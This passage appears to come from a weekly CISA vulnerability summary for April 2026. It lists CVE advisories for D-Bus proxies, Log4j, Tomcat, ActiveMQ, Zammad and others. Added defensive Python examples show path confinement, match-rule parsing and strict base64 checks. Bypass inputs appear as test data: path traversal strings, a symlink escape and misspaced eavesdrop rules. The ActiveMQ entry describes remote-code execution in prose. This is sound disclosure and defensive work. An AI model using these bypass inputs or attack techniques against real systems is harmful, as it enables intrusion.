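    """Delete base/<name> only after confinement succeeds.  This is the
    "clear the old checkout before re-fetching" step of a dependency
    fetcher and the "remove the stale cache file" step of a loader."""
    target = confine(base, name)
    if target == os.path.realpath(base):
        raise PathEscape("refusing to remove the base directory itself")
    # `target` is already symlink-resolved, so it is a real dir or file.
    if os.path.isdir(target):
        shutil.rmtree(target)
    elif os.path.exists(target):
        os.unlink(target)
    return target


def demo():
    """Constructed layout under a temp dir: deps/ with one real dependency
    and one symlink escaping to a sibling victim/ directory.  Returns the
    outcome per requested name and whether victim/keep.txt survived."""
    root = tempfile.mkdtemp()
    try:
        deps = os.path.join(root, "deps")
        victim = os.path.join(root, "victim")
        os.makedirs(os.path.join(deps, "gleam_stdlib"))
        os.makedirs(victim)
        with open(os.path.join(victim, "keep.txt"), "w") as f:
            f.write("important\n")
        os.symlink(victim, os.path.join(deps, "sneaky"))
        requested = ["gleam_stdlib", "../victim", victim, "sneaky", "sneaky/keep.txt"]
        outcomes = {}
        for name in requested:
            try:
                remove_cached_entry(deps, name)
                outcomes[name] = "removed"
            except PathEscape:
                outcomes[name] = "rejected"
        survived = os.path.exists(os.path.join(victim, "keep.txt"))
        return outcomes, survived
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The order matters: resolve first, compare second, delete last. A check on the unresolved string (looking for "..") is the part that is easy to get right and also the part a symlink defeats, which is why the commonpath comparison on the resolved path is the one that carries the security argument.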
flatpak--xdg-dbus-proxy
xdg-dbus-proxy is a filtering proxy for D-Bus connections. Prior to 0.1.7, a policy parser vulnerability allows bypassing eavesdrop restrictions. The proxy checks for eavesdrop=true in policy rules but fails to handle eavesdrop ='true' (with a space before the equals sign) and similar cases. Clients can intercept D-Bus messages they should not have access to. This vulnerability is fixed in 0.1.7.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-34080 [ https://www.cve.org/CVERecord?id=CVE-2026-34080 ]
https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GHSA-vjp5-hjfm-7677

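The filter-versus-parser mismatch in the entry above (CVE-2026-34080), as an added example in Python. This is not xdg-dbus-proxy's code. It contrasts a substring check for one spelling of eavesdrop=true with a filter that parses the match rule into key/value pairs and decides on the parsed result, failing closed on anything it cannot parse. The tolerance implemented here (whitespace around "=" and ",", optional single quotes, and the close-quote/backslash-quote/reopen idiom for an embedded quote) is an assumption about what a bus-side parser accepts, not a statement of the D-Bus match-rule grammar; the rules themselves are constructed.

```python
def naive_blocks_eavesdrop(rule):
    """The bypassable check: exact-text search for the expected spellings."""
    return "eavesdrop=true" in rule or "eavesdrop='true'" in rule


def _split_rule(rule):
    """Split a rule on commas that are not inside single quotes, keeping
    the '\\'' idiom (an escaped quote between two quoted runs) intact."""
    items, cur, quoted, i = [], [], False, 0
    while i < len(rule):
        ch = rule[i]
        if ch == "\\" and not quoted and i + 1 < len(rule) and rule[i + 1] == "'":
            cur.append("\\'")
            i += 2
            continue
        if ch == "'":
            quoted = not quoted
            cur.append(ch)
        elif ch == "," and not quoted:
            items.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    items.append("".join(cur))
    return [item for item in items if item.strip()]


def _unquote(value):
    """Turn the rule value syntax into a plain string: drop surrounding
    quotes and turn an unquoted \\' into a literal quote."""
    out, quoted, i = [], False, 0
    while i < len(value):
        ch = value[i]
        if ch == "'":
            quoted = not quoted
        elif ch == "\\" and not quoted and i + 1 < len(value) and value[i + 1] == "'":
            out.append("'")
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def parse_match_rule(rule):
    """Return {key: value} for a match rule, tolerating whitespace around
    '=' and ','.  Raises ValueError on a malformed item so that callers can
    fail closed instead of letting an unparsable rule through."""
    parsed = {}
    for item in _split_rule(rule):
        if "=" not in item:
            raise ValueError(f"no '=' in match rule item: {item!r}")
        key, _, raw = item.partition("=")
        key = key.strip()
        if not key:
            raise ValueError(f"empty key in match rule item: {item!r}")
        parsed[key] = _unquote(raw.strip())
    return parsed


def rule_requests_eavesdrop(rule):
    """Policy decision taken on parsed data; unparsable rules are treated
    as eavesdropping so they are refused rather than forwarded."""
    try:
        parsed = parse_match_rule(rule)
    except ValueError:
        return True
    return parsed.get("eavesdrop", "false").strip().lower() == "true"


if __name__ == "__main__":
    # Constructed rules: the spelling the naive filter expects, two that
    # slip past it, and a harmless one.
    for r in ["type='signal',eavesdrop='true'",
              "type='signal', eavesdrop ='true'",
              "eavesdrop = 'TRUE',type='method_call'",
              "type='signal',interface='org.example.Ping'"]:
        print(f"{r!r}: naive={naive_blocks_eavesdrop(r)} parsed={rule_requests_eavesdrop(r)}")
```

The general lesson is the one behind most filter bypasses: a security check that inspects the raw text must accept at least everything the downstream consumer accepts, or it must normalise the input into the consumer's own representation before deciding.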
Hydrosystem--Control System
Hydrosystem Control System does not enforce authorization for some directories. This allows an unauthorized attacker to read all files in these directories and even execute some of them. Critically, the attacker could run PHP scripts directly on the connected database. This issue was fixed in Hydrosystem Control System version 9.8.5.
Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-34184 [ https://www.cve.org/CVERecord?id=CVE-2026-34184 ]
https://cert.pl/posts/2026/04/CVE-2026-4901/
https://www.hydrosystem.poznan.pl/

Hydrosystem--Control System
Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database. This issue was fixed in Hydrosystem Control System version 9.8.5.
Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-34185 [ https://www.cve.org/CVERecord?id=CVE-2026-34185 ]
https://cert.pl/posts/2026/04/CVE-2026-4901/
https://www.hydrosystem.poznan.pl/

Apache Software Foundation--Apache ActiveMQ Broker
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-34197 [ https://www.cve.org/CVERecord?id=CVE-2026-34197 ]
https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt

nyariv--SandboxJS
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, the @nyariv/sandboxjs parser contains unbounded recursion in the restOfExp function and the lispify/lispifyExpr call chain. An attacker can crash any Node.js process that parses untrusted input by supplying deeply nested expressions (e.g., ~2000 nested parentheses), causing a RangeError: Maximum call stack size exceeded that terminates the process. This vulnerability is fixed in 0.8.36.
Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-34211 [ https://www.cve.org/CVERecord?id=CVE-2026-34211 ]
https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26

nyariv--SandboxJS
SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, a scope modification vulnerability exists in @nyariv/sandboxjs. The vulnerability allows untrusted sandboxed code to leak internal interpreter objects through the new operator, exposing sandbox scope objects in the scope hierarchy to untrusted code; an unexpected and undesired exploit. While this could allow modifying scopes inside the sandbox, code evaluation remains sandboxed and prototypes remain protected throughout the execution. This vulnerability is fixed in 0.8.36.
Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-34217 [ https://www.cve.org/CVERecord?id=CVE-2026-34217 ]
https://github.com/nyariv/SandboxJS/security/advisories/GHSA-hg73-4w7g-q96w

zammad--zammad
Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (meaning they can see each other's tickets) could see fields which are not intended for customers, including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these fields. This vulnerability is fixed in 7.0.1.
Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-34248 [ https://www.cve.org/CVERecord?id=CVE-2026-34248 ]
https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978

Sonatype--Nexus Repository
A reflected cross-site scripting vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2 that allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted URL. Exploitation requires user interaction.
Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-3438 [ https://www.cve.org/CVERecord?id=CVE-2026-3438 ]
https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html
https://support.sonatype.com/hc/en-us/articles/50609137161363

scoder--lupa
Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution.
Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-34444 [ https://www.cve.org/CVERecord?id=CVE-2026-34444 ]
https://github.com/scoder/lupa/security/advisories/GHSA-69v7-xpr6-6gjm

Python Software Foundation--CPython
When calling base64.b64decode() or related functions, the decoding process would stop after encountering the first padded quad regardless of whether there was more information to be processed. This can lead to data being accepted which may be processed differently by other implementations. Use "validate=True" to enable stricter processing of base64 data.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-3446 [ https://www.cve.org/CVERecord?id=CVE-2026-3446 ]
https://github.com/python/cpython/pull/145267
https://github.com/python/cpython/issues/145264
https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/
https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474
https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e
https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa

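What "validate=True" buys in the CPython entry above (CVE-2026-3446), as an added example in Python that is not CPython's own code. It puts the permissive call beside the strict one and adds the check most deployments actually want when a base64 token is used as a key into anything security-relevant: the input must be byte-for-byte the canonical encoding of its own decoded value, which also rejects non-zero leftover bits and missing padding that a strict decoder still accepts. The sample tokens are constructed; what the permissive call returns for data after the padding depends on the CPython version, which is the point of the advisory.

```python
import base64
import binascii


def lenient_decode(data):
    """The permissive call from the advisory.  Returns None if it raises,
    because what it does with data after the padding depends on the
    CPython version, which is the whole problem."""
    try:
        return base64.b64decode(data)
    except (binascii.Error, ValueError):
        return None


def strict_decode(data):
    """Decode with validate=True; None instead of an exception so 'invalid'
    is a first-class outcome for the caller."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def is_canonical_b64(data):
    """True only if `data` is byte-for-byte what encoding its own decoded
    value produces.  Rejects trailing data after padding, missing padding,
    and non-zero leftover bits (b'YR==' decodes to b'a' but re-encodes as
    b'YQ==')."""
    if isinstance(data, str):
        try:
            data = data.encode("ascii")
        except UnicodeEncodeError:
            return False
    decoded = strict_decode(data)
    return decoded is not None and base64.b64encode(decoded) == data


def classify(data):
    """'rejected' (strict decode fails), 'canonical', or
    'accepted-non-canonical' (decodes under validate=True but does not
    round-trip)."""
    if strict_decode(data) is None:
        return "rejected"
    return "canonical" if is_canonical_b64(data) else "accepted-non-canonical"


if __name__ == "__main__":
    # Constructed samples: a clean token, one with a second quad after the
    # padding, one with dirty trailing bits, and one with no padding at all.
    for sample in [b"YWJj", b"YQ==", b"YQ==YQ==", b"YR==", b"YQ"]:
        print(sample, classify(sample), lenient_decode(sample))
```

The round-trip check is deliberately stricter than validate=True: two conforming decoders can agree that b'YR==' means b'a' and still be fed different bytes by an attacker who relies on that slack, so for signatures, tokens and cache keys the encoded form itself is what should be compared.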
Apache Software Foundation--Apache Log4j Core
The fix for CVE-2025-68161 [ https://logging.apache.org/security.html#CVE-2025-68161 ] was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName [ https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName ] system property, but not when configured through the verifyHostName [ https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName ] attribute of the <Ssl> element. Although the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value. A network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:

* An SMTP, Socket, or Syslog appender is in use.
* TLS is configured via a nested <Ssl> element.
* The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.

This issue does not affect users of the HTTP appender, which uses a separate verifyHostname [ https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName ] attribute that was not subject to this bug and verifies host names by default. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-34477 [ https://www.cve.org/CVERecord?id=CVE-2026-34477 ]
https://github.com/apache/logging-log4j2/pull/4075
https://logging.apache.org/security.html#CVE-2026-34477
https://logging.apache.org/cyclonedx/vdr.xml
https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName
https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4

Apache Software Foundation--Apache Log4j Core
Apache Log4j Core's Rfc5424Layout [ https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout ], in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes. Two distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly:

* The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output.
* The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping.

Users of the SyslogAppender are not affected, as its configuration attributes were not modified. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-34478 [ https://www.cve.org/CVERecord?id=CVE-2026-34478 ]
https://github.com/apache/logging-log4j2/pull/4074
https://logging.apache.org/security.html#CVE-2026-34478
https://logging.apache.org/cyclonedx/vdr.xml
https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout
https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt

Apache Software Foundation--Apache Log4j 1 to Log4j 2 bridge
The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records. Two groups of users are affected:

* Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.
* Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.

Users are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue. Note: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the Log4j 1 to Log4j 2 migration guide [ https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html ], and specifically the section on eliminating reliance on the bridge.
Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-34479 [ https://www.cve.org/CVERecord?id=CVE-2026-34479 ]
https://github.com/apache/logging-log4j2/pull/4078
https://logging.apache.org/security.html#CVE-2026-34479
https://logging.apache.org/cyclonedx/vdr.xml
https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html
https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on

    Apache Software Foundation--Apache Log4j Core Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters. The impact depends on the StAX implementation in use: * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records. * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output. 2026-04-10 not yet calculated CVE-2026-34480 [ https://www.cve.org/CVERecord?id=CVE-2026-34480 ] https://github.com/apache/logging-log4j2/pull/4077 https://logging.apache.org/security.html#CVE-2026-34480 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb
    Apache Software Foundation--Apache Log4j JSON Template Layout Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records. An attacker can exploit this issue only if both of the following conditions are met: * The application uses JsonTemplateLayout. * The application logs a MapMessage containing an attacker-controlled floating-point value. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue. 2026-04-10 not yet calculated CVE-2026-34481 [ https://www.cve.org/CVERecord?id=CVE-2026-34481 ] https://github.com/apache/logging-log4j2/pull/4080 https://logging.apache.org/security.html#CVE-2026-34481 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/json-template-layout.html https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv
    Apache Software Foundation--Apache Tomcat Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve component of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. 2026-04-09 not yet calculated CVE-2026-34483 [ https://www.cve.org/CVERecord?id=CVE-2026-34483 ] https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b
    Apache Software Foundation--Apache Tomcat Missing Encryption of Sensitive Data vulnerability in Apache Tomcat due to the fix for CVE-2026-29146 allowing the bypass of the EncryptInterceptor. This issue affects Apache Tomcat: 11.0.20, 10.1.53, 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. 2026-04-09 not yet calculated CVE-2026-34486 [ https://www.cve.org/CVERecord?id=CVE-2026-34486 ] https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly
    Apache Software Foundation--Apache Tomcat Insertion of Sensitive Information into Log File vulnerability in the cloud membership for clustering component of Apache Tomcat exposed the Kubernetes bearer token. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.13 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. 2026-04-09 not yet calculated CVE-2026-34487 [ https://www.cve.org/CVERecord?id=CVE-2026-34487 ] https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h
    Apache Software Foundation--Apache Tomcat CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled and FFM is used in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M14 through 11.0.20, from 10.1.22 through 10.1.53, from 9.0.92 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fixes the issue. 2026-04-09 not yet calculated CVE-2026-34500 [ https://www.cve.org/CVERecord?id=CVE-2026-34500 ] https://lists.apache.org/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2
    Apache Software Foundation--Apache Airflow Apache Airflow versions 3.0.0 through 3.1.8 DagRun wait endpoint returns XCom result values even to users who only have DAG Run read permissions, such as the Viewer role. This behavior conflicts with the FAB RBAC model, which treats XCom as a separate protected resource, and with the security model documentation that defines the Viewer role as read-only. Airflow uses the FAB Auth Manager to manage access control on a per-resource basis. The Viewer role is intended to be read-only by default, and the security model documentation defines Viewer users as those who can inspect DAGs without accessing sensitive execution results. Users are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue. 2026-04-09 not yet calculated CVE-2026-34538 [ https://www.cve.org/CVERecord?id=CVE-2026-34538 ] https://github.com/apache/airflow/pull/64415 https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl
    randombit--botan Botan is a C++ cryptography library. In 3.11.0, the function Certificate_Store::certificate_known had a misleading name; it would return true if any certificate in the store had a DN (and subject key identifier, if set) matching that of the argument. It did not check that the cert it found and the cert it was passed were actually the same certificate. In 3.11.0 an extension of path validation logic was made which assumed that certificate_known only returned true if the certificates were in fact identical. The impact is that if an end entity certificate is presented, and its DN (and subject key identifier, if set) match that of any trusted root, the end entity certificate is accepted immediately as if it itself were a trusted root. This vulnerability is fixed in 3.11.1. 2026-04-07 not yet calculated CVE-2026-34580 [ https://www.cve.org/CVERecord?id=CVE-2026-34580 ] https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827
    randombit--botan Botan is a C++ cryptography library. Prior to version 3.11.1, the TLS 1.3 implementation allowed ApplicationData records to be processed prior to the Finished message being received. A server which is attempting to enforce client authentication via certificates can be bypassed by a client which entirely omits Certificate, CertificateVerify, and the Finished message and instead sends application data records. This vulnerability is fixed in 3.11.1. 2026-04-07 not yet calculated CVE-2026-34582 [ https://www.cve.org/CVERecord?id=CVE-2026-34582 ] https://github.com/randombit/botan/security/advisories/GHSA-pxcj-9ppx-g86g
    AcademySoftwareFoundation--openexr OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.1.0 to before 3.2.7, 3.3.9, and 3.4.9, internal_exr_undo_piz() advances the working wavelet pointer with signed 32-bit arithmetic. Because nx, ny, and wcount are int, a crafted EXR file can make this product overflow and wrap. The next channel then decodes from an incorrect address. The wavelet decode path operates in place, so this yields both out-of-bounds reads and out-of-bounds writes. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. 2026-04-06 not yet calculated CVE-2026-34588 [ https://www.cve.org/CVERecord?id=CVE-2026-34588 ] https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-cr5c-w6hf https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
    AcademySoftwareFoundation--openexr OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, the DWA lossy decoder constructs temporary per-component block pointers using signed 32-bit arithmetic. For a large enough width, the calculation overflows and later decoder stores operate on a wrapped pointer outside the allocated rowBlock backing store. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. 2026-04-06 not yet calculated CVE-2026-34589 [ https://www.cve.org/CVERecord?id=CVE-2026-34589 ] https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-p8xc-w3q4-h64x https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
    Checkmk GmbH--Checkmk Insufficient sanitization of dashboard dashlet title links in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows an attacker with dashboard creation privileges to perform stored cross-site scripting (XSS) attacks by tricking a victim into clicking a crafted dashlet title link on a shared dashboard. 2026-04-07 not yet calculated CVE-2026-3466 [ https://www.cve.org/CVERecord?id=CVE-2026-3466 ] https://checkmk.com/werk/19033 https://www.vulncheck.com/advisories/checkmk-stored-cross-site-scripting-in-dashlet-title
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the HTML sanitizer for ticket articles was missing proper sanitization of data: ... URI schemes, resulting in storing such malicious content in the database of the Zammad instance. The Zammad GUI renders this content; due to the applied CSP rules, no harm was done by, e.g., clicking such a link. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34718 [ https://www.cve.org/CVERecord?id=CVE-2026-34718 ] https://github.com/zammad/zammad/security/advisories/GHSA-c2cf-9fc7-jhf3
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the webhook model was missing a proper validation for loopback addresses or link-local addresses; only the URL scheme (HTTP/HTTPS) as well as the hostname was checked. This could end up in retrieving confidential metadata of cloud/hosting providers. The existing check is now extended and is applied when configuring webhooks as well as triggering webhook jobs. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34719 [ https://www.cve.org/CVERecord?id=CVE-2026-34719 ] https://github.com/zammad/zammad/security/advisories/GHSA-2vgc-vfh2-rw75
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the SSO mechanism in Zammad was not verifying that the header originates from a trusted SSO proxy/gateway before applying further actions on it. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34720 [ https://www.cve.org/CVERecord?id=CVE-2026-34720 ] https://github.com/zammad/zammad/security/advisories/GHSA-hcv6-w4h9-p2p7
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the OAuth callback endpoints for Microsoft, Google, and Facebook external credentials do not validate a CSRF state parameter. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34721 [ https://www.cve.org/CVERecord?id=CVE-2026-34721 ] https://github.com/zammad/zammad/security/advisories/GHSA-mfwp-hx66-626c
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the used endpoint for ticket creation was missing authorization if the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34722 [ https://www.cve.org/CVERecord?id=CVE-2026-34722 ] https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, unauthenticated remote attackers were able to access the getting started endpoint to get access to sensitive internal entity data, even after the system setup was completed. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34723 [ https://www.cve.org/CVERecord?id=CVE-2026-34723 ] https://github.com/zammad/zammad/security/advisories/GHSA-hcm9-ch62-5727
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, a server-side template injection vulnerability which leads to RCE via AI Agent exists. Impact is limited to environments where an attacker can control or influence type_enrichment_data (typically high-privilege administrative configuration). This vulnerability is fixed in 7.0.1. 2026-04-08 not yet calculated CVE-2026-34724 [ https://www.cve.org/CVERecord?id=CVE-2026-34724 ] https://github.com/zammad/zammad/security/advisories/GHSA-fg9w-jg8f-4j94
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id was not checking if a user is privileged to use the text tool, resulting in being able to use it in all situations. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-2026-34782 [ https://www.cve.org/CVERecord?id=CVE-2026-34782 ] https://github.com/zammad/zammad/security/advisories/GHSA-96r7-29c8-2j7q
    zammad--zammad Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id contains an authorization failure. Context data (e.g., a group or organization) supplied to be used in the AI prompt were not checked for whether they are accessible to the current user. This leads to having data present in the AI prompt that were not authorized before being used. A user needs to have ticket.agent permission to be able to use the provided context data. This vulnerability is fixed in 7.0.1. 2026-04-08 not yet calculated CVE-2026-34837 [ https://www.cve.org/CVERecord?id=CVE-2026-34837 ] https://github.com/zammad/zammad/security/advisories/GHSA-89vv-6639-wcv8







    ________________________________________________________________________

    This email was sent to cisa@toolazy.synchro.net using GovDelivery Communications Cloud, on behalf of: Cybersecurity and Infrastructure Security Agency · 707 17th St, Suite 4000 · Denver, CO 80202

    --===============2735279975235001205==
    Content-Type: text/html; charset="utf-8"
    MIME-Version: 1.0
    Content-Transfer-Encoding: quoted-printable

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
    <title> Vulnerability Summary for the Week of April 6, 2026
    </title>


    </head>
    <body style="">

    <table width="700" border="0" cellspacing="0" cellpadding="0" align="center">
    <tr>
    <td>

    <!--[if (gte mso 9)|(IE)]>
